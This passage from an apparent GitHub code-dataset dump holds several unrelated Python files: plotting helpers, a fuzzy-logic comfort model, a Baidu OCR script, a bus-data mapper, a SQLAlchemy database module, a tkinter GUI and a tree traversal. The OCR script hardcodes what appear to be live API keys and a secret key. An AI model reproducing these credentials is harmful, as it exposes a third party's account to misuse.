My Personal Navigator\n    Facebook\n    Instagram\n    Twitter\n    Reddit\n    Telegram
\n ''')","repo_name":"AashishBh/text_analyser_django","sub_path":"textutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17896643020","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef contourf(x, y, data, output, color, dpi=300, format='png'):\n\n width = x.max() - x.min()\n height = y.max() - y.min()\n\n fig = plt.figure()\n fig.set_size_inches(width / height, 1)\n ax = plt.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n plt.xlim(x.min(), x.max())\n plt.ylim(y.min(), y.max())\n\n plt.contourf(x, y, data, levels=color[\"levels\"],\n cmap=color[\"cmap\"], norm=color[\"norm\"])\n\n plt.savefig(output + '.' + format, format=format,\n transparent=True, dpi=dpi)\n\n plt.close(fig)\n\ndef contourfQuiver(x, y, ws, wd, output, step, color, dpi=300, format='png'):\n\n width = x.max() - x.min()\n height = y.max() - y.min()\n\n fig = plt.figure()\n fig.set_size_inches(width / height, 1)\n ax = plt.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n plt.xlim(x.min(), x.max())\n plt.ylim(y.min(), y.max())\n\n plt.contourf(x, y, ws, levels=color[\"levels\"], cmap=color[\n \"cmap\"], norm=color[\"norm\"])\n\n u = ws * np.cos(wd * np.pi / 180)\n v = ws * np.sin(wd * np.pi / 180)\n\n yy = np.arange(0, y.shape[0], step)\n xx = np.arange(0, x.shape[1], step)\n\n points = np.meshgrid(yy, xx)\n\n plt.quiver(x[points], y[points], u[points], v[points])\n\n plt.savefig(output + '.' + format, format=format,\n transparent=True, dpi=dpi)\n plt.close(fig)\n","repo_name":"ninthdayjt/gridsketch","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29156711247","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMethod uses Fuzzy Logic to define a comfort value in 0 and 1.\n\n\"\"\"\n\nimport skfuzzy as fuzz\nimport numpy as np \nfrom skfuzzy import control as ctrl\nfrom random import randint,random\nSEED=42\n\n\nclass Fz_Comfort:\n \n '''\n Class applies methods to build a comfort output between 0.1\n \n * Input: temperature and humidity user perception\n \n * Output: Load comfort level\n \n '''\n \n def __init__(self,temp,umidade,graf=0,lang=0):\n \n # Variáveis linguísticas\n self.temp_in = temp \n self.umidade_in = umidade\n if lang==0:\n # Valores das variáveis linguísticas\n self.t = ['muito fria','fria','amena','quente','muito quente'] \n self.u = ['baixa','mediana','alta']\n self.c = ['baixo','médio','alto']\n else: \n self.t = ['very cold','cold','mild','hot','very hot'] \n self.u = ['low','median','high']\n self.c = ['low','medium','high']\n \n \n # Função de início da classe \n self.Vars_Pert()\n self.Rules() \n self.Comput()\n if graf==1:\n self.Grap_result() \n \n def Vars_Pert(self):\n '''\n Method creates the input and output variables for the problem\n and assigns the mapping between the sharp and fuzzy values\n using the membership function\n * Humor : bad, good and great. Scale 0 to 10.\n * Temperature: cold, mild and hot. Scale 0 to 40.\n * Humidity : low, medium and high. Scale 30 to 65.\n * Comfort : low, medium and high. Scale 0 to 10.\n \n The effects of humidity on climate are felt in both temperatures and\n in the rainfall regime. 
Water, because of its specific heat, tends to conserve\n temperatures for a longer time, causing a smaller variation in them,\n i.e. the thermal amplitude (difference between the highest and lowest temperature)\n is smaller the higher the humidity in the air. Furthermore, in wetter regions\n or that are more affected by humidity, the rainfall regime tends to be higher,\n because the air saturation that causes condensation is more frequent.\n \n high humidity -> low temperature variation\n ''' \n #Entrada e pertinencia - 01\n self.temp = ctrl.Antecedent(np.arange(0, 41, 1), 'temperatura') \n self.temp[self.t[0]] = fuzz.trapmf(self.temp.universe, [0,0,10,18]) \n self.temp[self.t[1]] = fuzz.gaussmf(self.temp.universe, 18,3) \n self.temp[self.t[2]] = fuzz.gaussmf(self.temp.universe, 25,3) \n self.temp[self.t[3]] = fuzz.gaussmf(self.temp.universe, 35,4) \n self.temp[self.t[4]] = fuzz.gaussmf(self.temp.universe, 38,4) \n \n #Entrada e pertinencia - 02\n self.umidade = ctrl.Antecedent(np.arange(35,76,1), 'umidade')\n # self.umidade.automf(names=self.u)\n \n self.umidade[self.u[0]] = fuzz.trapmf(self.umidade.universe, [0,0,40, 50])\n self.umidade[self.u[1]] = fuzz.trimf(self.umidade.universe, [40, 55, 70])\n self.umidade[self.u[2]] = fuzz.trapmf(self.umidade.universe, [60, 70, 75,75])\n \n \n #Saída e pertinencia\n self.conf = ctrl.Consequent(np.arange(0, 1.1, 0.1), 'conforto') \n self.conf[self.c[0]] = fuzz.trapmf(self.conf.universe, [0.0, 0.0, 0.2, 0.4])\n self.conf[self.c[1]] = fuzz.trapmf(self.conf.universe, [0.2, 0.4, 0.6, 0.8])\n self.conf[self.c[2]] = fuzz.trapmf(self.conf.universe, [0.6, 0.8, 1.0, 1.0])\n \n def Rules(self):\n\n \n # *****************************************************************************************\n self.rule4 = ctrl.Rule(\n (self.temp[self.t[0]] | self.temp[self.t[1]]) |\n (self.temp[self.t[2]] & self.umidade[self.u[2]])\n ,self.conf[self.c[0]])\n \n self.rule5 = ctrl.Rule( \n (\n (self.temp[self.t[2]] | self.temp[self.t[3]]) &\n (self.umidade[self.u[0]] |self.umidade[self.u[1]]) )\n ,self.conf[self.c[1]])\n \n self.rule6 = ctrl.Rule(\n # (self.humor[self.h[1]] & \n (self.temp[self.t[4]]) |\n (self.temp[self.t[3]] & self.umidade[self.u[2]])\n ,self.conf[self.c[2]])\n \n \n # *****************************************************************************************\n self.conf_ctrl = ctrl.ControlSystem([\n # self.rule1, self.rule2, self.rule3,\n self.rule4,self.rule5,self.rule6,\n # self.rule7,self.rule8,self.rule9\n ])\n self.conf_simulador = ctrl.ControlSystemSimulation(self.conf_ctrl) \n\n def Comput(self):\n \n self.conf_simulador.input['temperatura'] = self.temp_in\n self.conf_simulador.input['umidade'] = self.umidade_in \n \n self.conf_simulador.compute()\n \n def Grap_result(self):\n #Resultados\n import matplotlib.pyplot as plt\n \n self.temp.view(sim=self.conf_simulador)\n plt.xlabel('Temperature range - \\u03C4 (°C)') \n plt.savefig('results/figures/Fz_temp.png', dpi = 500)\n \n self.umidade.view(sim=self.conf_simulador)\n plt.xlabel('Humidity range - \\u03C5 (%UR)') \n plt.savefig('results/figures/Fz_umid.png', dpi = 500)\n \n self.conf.view(sim=self.conf_simulador)\n plt.xlabel('Comfort level - \\u03C9') \n plt.savefig('results/figures/Fz_conf.png', dpi = 500) \n \n \nclass Fz_sim:\n \n ''' \n Class invokes methods of the Fz Comfort class to set comfort values.\n It uses as input random values of the 3 input variables.\n ''' \n \n def Fuzificar(self,t=None,u=None,h=None,graf=0,imp_texto=0,lang=0): \n np.random.seed(SEED)\n t = [t if t!=None else 
round(randint(0, 40)+random(),1)][0] \n u = [u if u!=None else round(randint(0, 99)+random(),1)][0] \n\n \n res = Fz_Comfort( temp = t,\n umidade = u,\n graf = graf,\n lang= lang,\n ).conf_simulador.output['conforto'] \n if imp_texto == 1:\n print('Input:\\n\\tThermal perception:',t,\n '| Humidity perception:',u,\n '\\n\\t Assigned comfort:',res,'\\n') \n \n return t,u,np.round(res,2)\n \n# ******************************************\n# Area of tests\n# ******************************************\na=Fz_sim().Fuzificar(30,60,graf=1,imp_texto=1,lang=1)\n# b=Fz_sim().Fuzificar(38,60,graf=1,imp_texto=1,lang=1)\n# Fz_sim().Fuzificar()\n\n","repo_name":"jonathacosta/SmartGrid","sub_path":"SCC-SHC/Codes/Userperception2v/ModConfFz.py","file_name":"ModConfFz.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12816467732","text":"from aip import AipOcr\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '11156578'\nAPI_KEY = '3K73kH6H4aGoZbUrE1N0oTO5'\nSECRET_KEY = 'YoL5g6BCnWG4mQvEo0TjyDPozlySdDRp'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n\n\n\"\"\" 读取图片 \"\"\"\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\nimage = get_file_content('c:/1.png')\n\"\"\" 调用网络图片文字识别, 图片参数为本地图片 \"\"\"\nclient.webImage(image);\n\n\"\"\" 如果有可选参数 \"\"\"\noptions = {}\noptions[\"detect_direction\"] = \"true\"\noptions[\"detect_language\"] = \"true\"\n\n\"\"\" 带参数调用网络图片文字识别, 图片参数为本地图片 \"\"\"\nresult1 = client.webImage(image, options)\nprint(result1)\nurl = \"https//www.x.com/sample.jpg\"\n\n\"\"\" 调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\nclient.webImageUrl(url);\n\n\"\"\" 如果有可选参数 \"\"\"\noptions = {}\noptions[\"detect_direction\"] = \"true\"\noptions[\"detect_language\"] = \"true\"\n\n\"\"\" 带参数调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\nclient.webImageUrl(url, options)\n\n","repo_name":"boyo116/AI-contentrecognition-imagerecognition","sub_path":"contentrecognize.py","file_name":"contentrecognize.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5737996351","text":"#!/usr/bin/python3\nimport sys\nfrom datetime import datetime\n\noccurence_set = set()\n\ndef join_values(*args) :\n\treturn \".\".join([str(arg) for arg in args])\n\ndef get_timeframe(time):\n\tif 4 * 60 <= time.minute + time.hour * 60 <= 12 * 60 :\n\t\treturn \"morning\"\n\n\tif 12 * 60 + 1 <= time.minute + time.hour * 60 <= 20 * 60 :\n\t\treturn \"afternoon\"\n\n\treturn \"night\"\n\nfor line in sys.stdin:\n\t# remove leading and trailing whitespace\n\tdata = line.strip().split(\",\")\n\ttry :\n\t\ttimestamp = int(data[0])//1000000\n\n\t\t# skip data without line_id\n\t\tline_id = int(data[1])\n\n\t\t# We distinct journey with different direction, hence \n\t\t# variant = direction + variant\n\t\tvariant = data[2] + \"-\" + data[3]\n\t\ttravel_number = int(data[5])\t\n\t\tts_date = datetime.fromtimestamp(timestamp)\n\t\ttimeframe = get_timeframe(ts_date)\n\t\n\t\t# With this, we skip data with null bus stop\n\t\tbus_stop = int(data[13])\n\n\t\toccurence_set_val = join_values(line_id, variant, travel_number, bus_stop)\n\n\t\t# Data is already sorted by timestamp\n\t\t# Original paper uses control point, so we want to simulate bus stops as control points\n\t\t# To do this, we just take the first occurence of data with key :\n\t\t# line_id, variant, travel_number, bus_stop\n\n\t\t# bus_stop means where the bus starts from\n\t\t# so , 
transition from bus stop 1 -> bus stop 2 means that the bus arrives at bus stop 2\n\t\t# so we take the first occurence of said data to be\n\n\t\t# Additionally, we may have some bus stops without at stops = 1\n\t\t# This is fine, since we can assume that :\n\t\t# 1. We can predict the data from the first timestamp, or\n\t\t# 2. The bus did not stop at said bus stop\n\n\t\t# Format : line_id.variant.travel_number.timestamp\n\t\t# Key : compound line_id.variant(primary).travel_number.timestamp(secondary, sorting)\n\t\t# info : travel_number.timestamp.bus_stop.timeframe\n\t\tif occurence_set_val not in occurence_set :\n\t\t\toccurence_set.add(occurence_set_val)\n\t\t\tkey = join_values(line_id, variant, travel_number, timestamp)\n\t\t\tvalue = join_values(travel_number, timestamp, bus_stop, timeframe)\n\t\t\tprint(\"{}\\t{}\".format(key, value))\n\n\texcept Exception :\n\t\tcontinue\n\n\n\n","repo_name":"AlamHasabie/bus-statistics","sub_path":"mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5060646285","text":"import llog\n\nimport asyncio\nimport threading\nimport logging\nfrom contextlib import contextmanager\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.schema import Index\nfrom sqlalchemy import create_engine, text, event, MetaData, func, Table,\\\n Column, ForeignKey, Integer, String, DateTime, TypeDecorator\nfrom sqlalchemy.exc import ProgrammingError, OperationalError\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.pool import Pool\nfrom sqlalchemy.types import LargeBinary, Boolean, DateTime\n\nimport consts\nimport mutil\n\nlog = logging.getLogger(__name__)\n\nLATEST_SCHEMA_VERSION = 4\n\nBase = declarative_base()\n\nPeer = None\nDataBlock = None\nNodeState = None\nDmailAddress = None\nDmailKey = None\nDmailMessage = None\nDmailPart = None\nDmailTag = None\n\nclass UtcDateTime(TypeDecorator):\n impl = DateTime\n\n def process_result_value(self, value, dialect):\n return\\\n None if value is None else value.replace(tzinfo=mutil.UTC_TZINFO)\n\ndef _init_daos(Base, d):\n # If I recall correctly, this abomination is purely for PostgreSQL mode,\n # and only for the create schema. It is because while setting the\n # search_path works for all usage, there is the one exception that the\n # create schema code of SQLAlchemy runs before that gets set or something\n # (I think that was it) and the schema won't be created in separate schemas\n # as desired. 
Hopefully we can get SQLAlchemy fixed and then this\n # complication removed.\n class Peer(Base):\n __tablename__ = \"peer\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String(48), nullable=True)\n\n node_id = Column(LargeBinary, nullable=True)\n pubkey = Column(LargeBinary, nullable=True)\n\n distance = Column(Integer, nullable=True)\n direction = Column(Integer, nullable=True)\n\n address = Column(String, nullable=True)\n\n connected = Column(Boolean, nullable=False)\n\n last_connect_attempt = Column(UtcDateTime, nullable=True)\n\n Index(\"node_id\", Peer.node_id)\n Index(\"distance\", Peer.distance)\n Index(\"connected\", Peer.connected)\n Index(\"connected_distance\", Peer.connected, Peer.distance)\n Index(\"address\", Peer.address)\n\n d.Peer = Peer\n\n class DataBlock(Base):\n __tablename__ = \"datablock\"\n\n id = Column(Integer, primary_key=True)\n data_id = Column(LargeBinary, nullable=False)\n distance = Column(LargeBinary, nullable=False)\n original_size = Column(Integer, nullable=False)\n insert_timestamp = Column(UtcDateTime, nullable=False)\n last_access = Column(UtcDateTime, nullable=True)\n version = Column(String, nullable=True) # str for sqlite bigint :(.\n signature = Column(LargeBinary, nullable=True)\n epubkey = Column(LargeBinary, nullable=True)\n pubkeylen = Column(Integer, nullable=True)\n target_key = Column(LargeBinary, nullable=True)\n\n Index(\"data_id\", DataBlock.data_id)\n Index(\"datablock__distance\", DataBlock.distance.desc())\n\n d.DataBlock = DataBlock\n\n class NodeState(Base):\n __tablename__ = \"nodestate\"\n\n key = Column(String(64), primary_key=True)\n value = Column(String(128), nullable=True)\n\n d.NodeState = NodeState\n\n class DmailKey(Base):\n __tablename__ = \"dmailkey\"\n\n id = Column(Integer, primary_key=True)\n parent_id = Column(Integer, ForeignKey(\"dmailaddress.id\"))\n x = Column(LargeBinary, nullable=False)\n target_key = Column(LargeBinary, nullable=False)\n difficulty = Column(Integer, nullable=False)\n\n d.DmailKey = DmailKey\n\n class DmailAddress(Base):\n __tablename__ = \"dmailaddress\"\n\n id = Column(Integer, primary_key=True)\n site_key = Column(LargeBinary, nullable=False)\n site_privatekey = Column(LargeBinary, nullable=True)\n scan_interval = Column(Integer, nullable=True)\n keys = relationship(DmailKey)\n messages = relationship(\"DmailMessage\")\n\n Index(\"dmailaddress__site_key\", DmailAddress.site_key)\n\n d.DmailAddress = DmailAddress\n\n dmail_message__dmail_tag = Table(\\\n \"dmail_message__dmail_tag\",\\\n Base.metadata,\\\n Column(\"dmail_message_id\", Integer, ForeignKey(\"dmailmessage.id\")),\\\n Column(\"tag_id\", Integer, ForeignKey(\"dmailtag.id\")))\n\n class DmailTag(Base):\n __tablename__ = \"dmailtag\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n\n Index(\"dmailtag__name\", DmailTag.name)\n\n d.DmailTag = DmailTag\n\n class DmailPart(Base):\n __tablename__ = \"dmailpart\"\n\n id = Column(Integer, primary_key=True)\n dmail_message_id = Column(Integer, ForeignKey(\"dmailmessage.id\"))\n mime_type = Column(String, nullable=True)\n data = Column(LargeBinary, nullable=False)\n\n d.DmailPart = DmailPart\n\n class DmailMessage(Base):\n __tablename__ = \"dmailmessage\"\n\n id = Column(Integer, primary_key=True)\n dmail_address_id = Column(Integer, ForeignKey(\"dmailaddress.id\"))\n dmail_key_id = Column(Integer, nullable=True)\n data_key = Column(LargeBinary, nullable=False)\n sender_dmail_key = Column(LargeBinary, nullable=True)\n sender_valid = 
Column(Boolean, nullable=True)\n destination_dmail_key = Column(LargeBinary, nullable=True)\n destination_significant_bits = Column(Integer, nullable=True)\n subject = Column(String, nullable=False)\n date = Column(UtcDateTime, nullable=False)\n read = Column(Boolean, nullable=False)\n hidden = Column(Boolean, nullable=False)\n deleted = Column(Boolean, nullable=False)\n tags = relationship(DmailTag, secondary=dmail_message__dmail_tag)\n address = relationship(DmailAddress)\n parts = relationship(DmailPart, cascade=\"all, delete-orphan\")\n\n Index(\"dmailmessage__data_key\", DmailMessage.data_key)\n\n d.DmailMessage = DmailMessage\n\n return d\n\nclass Db():\n def __init__(self, loop, url, schema=None):\n self.loop = loop\n self.url = url\n self.Session = None\n\n self.engine = None\n\n self.schema = schema\n\n self.is_sqlite = False\n self.sqlite_lock = None\n\n self.pool_size = 10\n\n @property\n def schema(self):\n return self._schema\n\n @schema.setter\n def schema(self, value):\n self._schema = value\n self._schema_setcmd = \"set search_path={}\".format(self._schema)\n\n @contextmanager\n def open_session(self, read_only=False):\n read_only = False; #TODO: Need to implement a read-write lock.\n\n if self.sqlite_lock and not read_only:\n self.sqlite_lock.acquire()\n\n try:\n session = self.Session()\n try:\n yield session\n finally:\n try:\n session.close()\n except TypeError:\n log.exception(\"SqlAlchemy crashed; workaround engaged;\"\\\n \" Session leaked! Upgrade to 1.0.8 to prevent this!\")\n except Exception:\n log.exception(\"Db session contextmanager.\")\n raise\n finally:\n if self.sqlite_lock and not read_only:\n self.sqlite_lock.release()\n\n def lock_table(self, sess, tableobj):\n if self.sqlite_lock:\n return\n\n st = \"LOCK \\\"{}\\\" IN SHARE ROW EXCLUSIVE MODE\"\\\n .format(tableobj.__table__.name)\n sess.execute(st)\n\n def init_engine(self):\n self.is_sqlite = self.url.startswith(\"sqlite:\")\n\n log.info(\"Creating engine.\")\n if self.is_sqlite:\n self.engine = create_engine(self.url, echo=False)\n else:\n self.engine = create_engine(\\\n self.url, echo=False,\n pool_size=self.pool_size, max_overflow=0)\n\n log.info(\"Configuring engine...\")\n if self.is_sqlite:\n self.sqlite_lock = threading.Lock()\n\n # The following KLUDGE is from SqlAlchemy docs. 
SqlAlchemy says the\n # pysqlite drivers is broken and decides to 'help' by not honoring\n # your transaction begin statement and to also auto commit even\n # though you told it not to.\n @event.listens_for(self.engine, \"connect\")\n def do_connect(dbapi_connection, connection_record):\n # Disable pysqlite's emitting of the BEGIN statement entirely.\n # Also stops it from emitting COMMIT before any DDL.\n dbapi_connection.isolation_level = None\n\n @event.listens_for(self.engine, \"begin\")\n def do_begin(conn):\n # Emit our own BEGIN.\n conn.execute(\"BEGIN\")\n else:\n if self.schema:\n event.listen(\\\n self.engine.pool, \"connect\", self._set_search_path)\n\n self.Session = sessionmaker(bind=self.engine)\n\n def _set_search_path(self, conn, proxy):\n if log.isEnabledFor(logging.INFO):\n log.info(\"Setting search path [{}].\".format(self.schema))\n conn.cursor().execute(self._schema_setcmd)\n conn.commit()\n\n @asyncio.coroutine\n def ensure_schema(self):\n yield from self.loop.run_in_executor(None, self._ensure_schema)\n\n def _ensure_schema(self):\n log.info(\"Checking schema.\")\n\n new_db = False\n\n with self.open_session(True) as sess:\n q = sess.query(NodeState)\\\n .filter(NodeState.key == consts.NSK_SCHEMA_VERSION)\n\n try:\n r = q.first()\n except OperationalError:\n new_db = True\n\n if new_db:\n log.info(\"Database schema is missing, creating.\")\n self._create_schema()\n\n with self.open_session() as sess:\n ns = NodeState()\n ns.key = consts.NSK_SCHEMA_VERSION\n ns.value = str(LATEST_SCHEMA_VERSION)\n sess.add(ns)\n sess.commit()\n return\n\n if r:\n version = int(r.value)\n else:\n # This is the schema before we started tracking version in db.\n version = 1\n\n if log.isEnabledFor(logging.INFO):\n log.info(\"Existing schema detected (version=[{}]).\".format(version))\n\n # Perform necessary upgrades.\n if version == 1:\n if _test_and_fix_if_really_4(self):\n version = 4\n else:\n _upgrade_1_to_2(self)\n version = 2\n\n if version == 2:\n _upgrade_2_to_3(self)\n version = 3\n\n if version == 3:\n _upgrade_3_to_4(self)\n version = LATEST_SCHEMA_VERSION\n\n def _create_schema(self):\n log.info(\"Creating schema.\")\n\n if self._schema:\n tmp_Base = declarative_base()\n d = _init_daos(tmp_Base, DObject())\n for t in tmp_Base.metadata.tables.values():\n t.schema = self.schema\n\n try:\n tmp_Base.metadata.create_all(self.engine)\n except ProgrammingError:\n with self.open_session() as sess:\n st = \"CREATE SCHEMA {}\".format(self.schema)\n sess.execute(st)\n sess.commit()\n\n tmp_Base.metadata.create_all(self.engine)\n else:\n Base.metadata.create_all(self.engine)\n\nclass DObject(object):\n pass\n\nif Peer is None:\n d = _init_daos(Base, DObject())\n\n Peer = d.Peer\n DataBlock = d.DataBlock\n NodeState = d.NodeState\n\n # Maalstroom Dmail Client.\n DmailAddress = d.DmailAddress\n DmailKey = d.DmailKey\n DmailMessage = d.DmailMessage\n DmailPart = d.DmailPart\n DmailTag = d.DmailTag\n\ndef _update_node_state(sess, version):\n \"Caller must call commit.\"\n\n q = sess.query(NodeState)\\\n .filter(NodeState.key == consts.NSK_SCHEMA_VERSION)\n\n ns = q.first()\n\n if not ns:\n ns = NodeState()\n ns.key = consts.NSK_SCHEMA_VERSION\n sess.add(ns)\n\n ns.value = str(version)\n\ndef _test_and_fix_if_really_4(db):\n with db.open_session() as sess:\n q = sess.query(DmailMessage)\\\n .filter(DmailMessage.deleted == False)\n\n try:\n test = q.all()\n\n _update_node_state(sess, 4)\n\n sess.commit()\n\n is_4 = True\n except Exception:\n is_4 = False\n\n return is_4\n\ndef 
_upgrade_1_to_2(db):\n log.warning(\"NOTE: Upgrading database schema from version 1 to 2.\")\n\n t_bytea = \"BLOB\" if db.is_sqlite else \"bytea\"\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailmessage ADD COLUMN destination_dmail_key \"\\\n + t_bytea\n\n sess.execute(st)\n\n st = \"ALTER TABLE dmailmessage ADD COLUMN\"\\\n \" destination_significant_bits \"\\\n + t_integer\n\n sess.execute(st)\n\n _update_node_state(sess, 2)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n\ndef _upgrade_2_to_3(db):\n log.warning(\"NOTE: Upgrading database schema from version 2 to 3.\")\n\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailaddress ADD COLUMN scan_interval \"\\\n + t_integer\n\n sess.execute(st)\n\n _update_node_state(sess, 3)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n\ndef _upgrade_3_to_4(db):\n log.warning(\"NOTE: Upgrading database schema from version 3 to 4.\")\n\n t_integer = \"INTEGER\" if db.is_sqlite else \"integer\"\n\n with db.open_session() as sess:\n st = \"ALTER TABLE dmailmessage ADD COLUMN dmail_key_id \"\\\n + t_integer\n\n sess.execute(st)\n\n default = \"0\" if db.is_sqlite else \"false\"\n\n st = \"ALTER TABLE dmailmessage ADD COLUMN deleted BOOLEAN not null\"\\\n + \" default \" + default\n\n sess.execute(st)\n\n _update_node_state(sess, 4)\n\n sess.commit()\n\n log.warning(\"NOTE: Database schema upgraded.\")\n","repo_name":"bitcoinembassy/morphis","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":14144,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"31195362807","text":"#!/usr/bin/python3\n\"\"\"\nhttps://docs.python.org/3/library/tkinter.html\nhttps://likegeeks.com/python-gui-examples-tkinter-tutorial/\n\"\"\"\nimport tkinter as tk\nimport tkinter.scrolledtext\n\nSTARTING_PAIRS_TUPLE = (\"(0, 1) - Trivial\", \"(13/84, 55/84) - Bourgain\", \"(9/56, 37/56) - Bombieri and Iwaniec\", \"(89/560, 369/560) - Watt\")\n\n\n\n\n#################################################\n# Methods\n#################################################\ndef searchPairs():\n \"\"\"\n thetaInput is defined below as the ScrolledText where the user types the theta functions\n \"\"\"\n thetaInputContents = thetaInput.get(\"1.0\", tk.END)\n print(thetaInputContents)\n\n\n#################################################\n# Script start\n#################################################\n#setup the window\nwindow = tk.Tk()\nwindow.title(\"pairsearch: Exponent pair searcher\")\nwindow.geometry(\"600x500\")\n\n#add the instructions and the textbox\ninstructionLabel = tk.Label(window, text=\"Minimize the maximum of\\nthe following theta functions:\", font=(\"Arial\", 12), justify=tk.LEFT)\ninstructionLabel.grid(row=0, column=0, sticky=tk.W)\nthetaInput = tkinter.scrolledtext.ScrolledText(window, height=10, width=20, font=(\"consolas\", 12)) \nthetaInput.grid(row=1, column=0)\n\n#add the descriptive label\nthetaText = \"Each line in the box\\ncorresponds to a \\u03b8 function\\n\\n\\u03b8(k,l) = (ak + bl + c)/(dk + el + f)\\ncorresponds to the line\\na,b,c,d,e,f\"\nthetaLabel = tk.Label(window, text=thetaText, font=(\"Arial\", 12), justify=tk.LEFT)\nthetaLabel.grid(row=0, column=1, rowspan=2, columnspan=2)\n\n#add the number of operations label/spinner\nprocessCountFrame = tk.Frame(window)\nprocessCountFrame.grid(row=3, 
column=0, columnspan=2, sticky=tk.W)\nprocessCountLabel = tk.Label(processCountFrame, text=\"Max number of A/B steps: \", font=(\"Arial\", 12), justify=tk.LEFT)\nprocessCountLabel.grid(row=0, column=0)\nprocessCountSpinner = tk.Spinbox(processCountFrame, from_=1, to_=100, width=3)\nprocessCountSpinner.grid(row=0, column=1)\n#PIZZA - default to 5\n\n#select starting pair from dropdown?\nstartPairFrame = tk.Frame(window)\nstartPairFrame.grid(row=4, column=0, columnspan=2, sticky=tk.W)\nstartPairLabel = tk.Label(startPairFrame, text=\"Starting pair: \", font=(\"Arial\", 12), justify=tk.LEFT)\nstartPairLabel.grid(row=0, column=0)\nstartPairVariable = tk.StringVar()\nstartPairVariable.set(STARTING_PAIRS_TUPLE[0])\nstartPairDropdown = tk.OptionMenu(startPairFrame, startPairVariable, *STARTING_PAIRS_TUPLE)\nstartPairDropdown.grid(row=0, column=1)\n\n#add the run button\nrunButton = tk.Button(window, text=\"Run\", font=(\"Arial\", 12), command=searchPairs)\nrunButton.grid(row=5, column=0)\n\n#start the gui\nwindow.mainloop()\n","repo_name":"albong/pairsearch","sub_path":"pairsearch.py","file_name":"pairsearch.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4418667110","text":"\nclass Node:\n\n # Constructor to create a new node\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef MorrisTraversal(root):\n # Set current to root of binary tree\n current = root\n\n while (current is not None):\n\n if current.left is None:\n print(current.data)\n current = current.right\n else:\n pre = current.left\n while (pre.right is not None and pre.right != current):\n pre = pre.right\n\n # Make current as right child of its inorder predecessor\n if (pre.right is None):\n pre.right = current\n current = current.left\n\n # Revert the changes made in if part to restore the original tree\n # fix the right child of predecssor\n else:\n pre.right = None\n print(current.data)\n current = current.right\n\n\n\"\"\" \nConstructed binary tree is\n 1\n / \\\n 2 3\n / \\\n 4 5\n\"\"\"\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\n\nMorrisTraversal(root)","repo_name":"Taoge123/LeetCode","sub_path":"Binary Tree/InorderWIthoutRecursionAndStack.py","file_name":"InorderWIthoutRecursionAndStack.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39649750445","text":"from accounts.models import User\n\nfrom django.test import TestCase\n\nfrom post.forms import CreatePostForm, UpdatePostForm\nfrom post.models import Posts\n\n\nclass TestForms(TestCase):\n username = None\n posts = None\n\n @classmethod\n def setUpTestData(cls):\n cls.username = 'user_1'\n User.objects.create_user(\n username=cls.username,\n password='12345Qwerty',\n email='test1@gmail.com',\n is_activated=True\n )\n\n cls.posts = 'test_post'\n Posts.objects.create(\n title=cls.posts,\n author=User.objects.get(username=cls.username),\n text='abc123'\n )\n\n def setUp(self):\n self.post = Posts.objects.get(author__username=self.username)\n\n def test_create_update_post_form(self):\n form = CreatePostForm(\n data={\n 'title': self.post.title,\n 'text': self.post.text\n }\n )\n form_update = UpdatePostForm(\n data={\n 'title': self.post.title,\n 'text': self.post.text\n }\n )\n\n self.assertEqual(form.is_valid(), form_update.is_valid(), True)\n\n def 
